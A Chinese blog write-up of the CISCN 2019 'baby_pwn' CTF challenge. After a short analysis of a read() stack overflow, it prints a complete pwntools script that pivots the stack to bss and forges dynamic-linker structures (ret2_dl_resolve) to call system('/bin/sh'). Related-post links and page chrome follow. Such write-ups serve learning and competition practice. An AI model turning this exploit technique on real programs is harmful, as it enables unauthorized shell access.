2019国赛2.baby_pwn 利用ret2_dl_resolve

最新推荐文章于 2022-07-26 19:25:58 发布
最新推荐文章于 2022-07-26 19:25:58 发布
阅读量631 收藏
点赞数
分类专栏: 赛事复现 文章标签: 信息安全大赛 pwn ret2_dl
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42037374/article/details/89929009
版权

解题思路
1. 查看文件信息,安全机制
2. 代码审计
3. 分析漏洞点
4. 编写EXP

1.查看文件的属性

分析:
1.查看文件的属性 checksec 可行性文件名
在这里插入图片描述
2.阅读伪源码查看溢出大小

{
  char buf; // [sp+0h] [bp-28h]@1

  return read(0, &buf, 0x100u);
}  
注:这里可以结合gdb-peda的 pattern命令 查看溢出大小

在这里插入图片描述

代码审计

通过IDA的观察
在这里插入图片描述
只有一个read(我们没有libc文件),strings里面没有可以利用的敏感字符串

漏洞分析

因为伪代码过于单一 ,首先想到的就是ret2_dl_resolve
ret2_dl的最重要的两个关键点就是offset的确定,在这里一定要重视下面的这张图
在这里插入图片描述
平常我们都是利用函数结尾reaveret的结合,这就造成了,我们上面找出来的EIP不是我们可以利用的,这里需要找文章去查看,函数结尾的不同是怎么影响寄存器里面值的变化
在这里我一直陷入了一个误区就是,我利用了pwn350的末尾堆栈不平衡的想法一直在构造寄存器里面的数值,其实这个题可以直接覆盖到EXP的地方
这里有一个很好的判断,直接利用pattern search只要没有到EIP的值,我就需要考虑,保持函数末尾的堆栈平衡

编写EXP

这里我们可以直接将脚本拿过来使用,但是一定要在懂得原理的情况下使用,不然可能只需要改一个值,你都不知道从何处下手
根据我的2019_iscc_pwn350的脚本修改了一下

#!/usr/bin/env python
#coding:utf-8
from pwn import *
context.log_level = 'debug'  
context.terminal = ['gnome-terminal','-x','bash','-c']   
context(os='linux',arch='i386')

p = process('./pwn')
P = ELF('./pwn')
rop = ROP('./pwn')

leave = 0x0804854A  #这个地方我们可以单纯的利用地址  所以直接找leave就可以了
bss = 0x0804aa00  #这个地方我们,我们需要将地址取到超出地址边缘 ,要是数据写在bss段,我们需要将这个值改为bss段的地址
pppr_addr = 0x080485d9
pop_ebp = 0x080485db

payload = (0x28+4) * 'a'
payload+= p32(P.plt['read'])
payload+= p32(pppr_addr)
payload+= p32(0)
payload+= p32(bss) 
payload+= p32(0x400)
payload+= p32(pop_ebp)
payload+= p32(bss)
payload+= p32(leave)
p.send(payload)

sleep(1)

elf = ELF('./pwn')
rop = ROP('./pwn')
plt_0 = elf.get_section_by_name('.plt').header.sh_addr
rel_plt = elf.get_section_by_name('.rel.plt').header.sh_addr
dynsym = elf.get_section_by_name('.dynsym').header.sh_addr
dynstr = elf.get_section_by_name('.dynstr').header.sh_addr


fake_sys_addr = bss + 36
align = 0x10 - ((fake_sys_addr-dynsym)&0xf)
fake_sys_addr = fake_sys_addr + align
index = (fake_sys_addr - dynsym)/0x10
r_info = (index << 8) + 0x7
st_name = (fake_sys_addr + 0x10) - dynstr
fake_sys = p32(st_name) + p32(0) + p32(0) + p32(0x12) 

fake_rel = p32(P.got['read']) + p32(r_info)
fake_rel_addr = bss + 28
fake_index = fake_rel_addr - rel_plt    
sh = '/bin/sh'


rop.raw(bss)  #这里我们到达了可以写入的一段空间
rop.raw(plt_0)
rop.raw(fake_index)
rop.raw('bbbb')
rop.raw(bss+82)   #
rop.raw('bbbb')
rop.raw('bbbb')

rop.raw(fake_rel)
rop.raw(align * 'a')
rop.raw(fake_sys)
rop.raw('system\x00')
rop.raw('a'*(80 - len(rop.chain())))
print len(rop.chain())  #这一步一定要加上,不然你会不知道 上面#处的82是哪里来的
rop.raw(sh+'\x00')
rop.raw('a'*(100 - len(rop.chain())))
p.sendline(rop.chain())
p.interactive()

分析EXP

首先需要进行栈迁移,由于我们的栈空间太小,不足以让我们操作,我们先利用got表复写术,来将返回地址,进行栈迁移,然后修改。

-参考文献:

Jc^
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
baby_pwn ciscn 2019 第十二届全大学生信息安全竞
04-22
baby_pwn 题 ciscn 2019 第十二届全大学生信息安全竞
baby_pwn-ret2_dl_runtime_resolve之ELF32_rel,Elf32_sym,伪造
playmaker的博客
05-07 700
0x01 ELF文件的动态链接之延迟绑定 在动态链接下,程序模块之间包含了大量的函数引用,动态链接会耗费不少时间用于解决模块之间的函数引用的符号查找以及重定位,且一部分函数在执行结束都不会用到,如果一开始链接好实际上是一种浪费,于是ELF采取的这种技术。 0x02 延迟绑定的实现过程 ...
强网杯2021 pwn 题解析——babypwn
CoLin的pwn小屋
07-26 738
强网杯2021 pwn 题回顾——babypwn
0ctf2017-babypwn
CharlesGodX的博客
09-10 778
前言 本片文章从0ctf2017-babyheap这一道pwn题目入手,讲解pwn堆中的一些利用手法 题目链接 分析程序 首先检查程序保护,所有的保护措施都是开启的,这意味着我们想要改写程序流程考虑从malloc_hook和free_hook入手 [*] '/home/thunder/Desktop/codes/ctf/pwn/heap/0ctf_babyheap/0ctfbabyheap' ...
Linux pwn 之 ret2_dl_resolve
蚁景网安学院
12-27 393
点击置顶链接上合天lab玩转CTF!了解re2_dl_resolve,首先要弄清楚基础的got表和plt表got表 和 plt表plt表,过程链接表,过程链接表的作用是将位置无关的符号转...
vn_pwn_babybabypwn_1(SROP+栈迁移)
seaaseesa的博客
04-09 599
vn_pwn_babybabypwn_1 首先检查一下程序的保护机制 然后,我们用IDA分析一下 显然一个signreturn的系统调用,因此可以做SROP。由于开启了PIE,因此,我们不考虑程序的bss段,而是考虑glibc的bss段,因为重新一开始告诉了我们puts函数的地址,我们就可以知道glibc的地址。我们先利用read在glibc的bss段布置下rop,然后栈迁移过去即可...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
PWM.rar_PWN
09-23
简易pwn代码,可用于亮度调节,直流电机转速之类调节
PWM-OUT.rar_PWN_out
09-19
原子 的PWN 输出,寄存器程序,完全寄存器操作,可以直接打开。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
2021强网杯 pwn babypwn
yongbaoii的博客
07-15 554
libc是2.27的。 保护全开。 还开了沙箱。 经典增删改查。 add 最多17个chunk,chunk的大小最大0x200.地址跟发小都放在了bss上面。 delete 清理的很干净。 edit edit也看着没啥,里面有个函数,进去看看。 会把所有的’\x11’变成’\x00’,但是问题就出在它没有边界,仅仅是到’\x00’就停而已。那么我们就可以有越界,来造成off by null。 show 输出都点不大正常。首先发现它是前后四个字节分开的。 然后看一下那个输出函数。 加密的,好家伙。 先.
N1CTF2019——babypwn WP
qq_41252520的博客
10-13 549
保护 我的测试环境为ubuntu16.04.1 分析 添加操作中限制只能添加10个结构体: 结构体为: struct Staff{ char Name[0x10]; char *Description; int Description_Size; }; 漏洞存在删除操作中: 总的二进制程序逆向分析到这,下面来考虑怎么利用利用 这道题和warmup那道题有点相似,但...
2019全大学生信息安全竞pwn前四题writeup—栈部分
weixin_33736649的博客
04-28 402
ret to libc技巧:https://blog.csdn.net/zh_explorer/article/details/80306965 如何leak出libc地址:基地址+函数在libc中的偏移地址=函数真实地址 1.已知libc,函数地址-函数在libc中的地址=基地址 2.不知道libc,就要leak出libc中的两个函数 转载于:https://www.cnblogs.com...
hctf[pwn]babyprintf_ver2
九层台
11-15 795
0x01程序分析 程序给出了data段的地址,然后允许向这个地址处输入0x1ff个字节。 这个data段到底存的是什么呢? pwndbg&gt; print $rbx + $rax $1 = 0x555555756011 pwndbg&gt; x /50xg 0x555555756011 0x555555756011: 0x7200676664647364 0x200000000000646c ...
CTF-PWN-babysc(Hgame)
SuperGate的博客
02-04 774
直接运行该程序,发现没有任何提示信息,随便输入一串字符之后,程序错误退出。 扔进ida查看: 程序用read函数读入buf,然后判断[rbp+var_4]和0x4f的大小关系。这里可以知道[rbp+var_4]应为循环变量,buf长度为80 然后对于buf[i] ,异或buf[i]^(i+1),最后将buf蕴含的指令赋值给rdx并执行。 我们可以考虑直接构造system(/bin/sh...
(攻防世界)(pwn)pwn1(厦门邀请)babystack
PLpa的博客
07-21 2492
canary!canary!canary! 拿到题目,下载附件,查看保护。 可以很清楚的看到,程序开了canary,这就说明我们不能实现暴力的栈溢出,还要考虑这个canary的值。 我们首先运行一下程序: 可以很清楚的看出程序的功能,当我们选择1时,我们就可以输入,当我们选择2时,我们可以输出我们前面输入的东西。 进入IDA看源代码: 我们可以看到canary的值存放在v6里,v6距离rbp...
20191.your_pwn
Jc
05-13 1267
1.文件属性
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值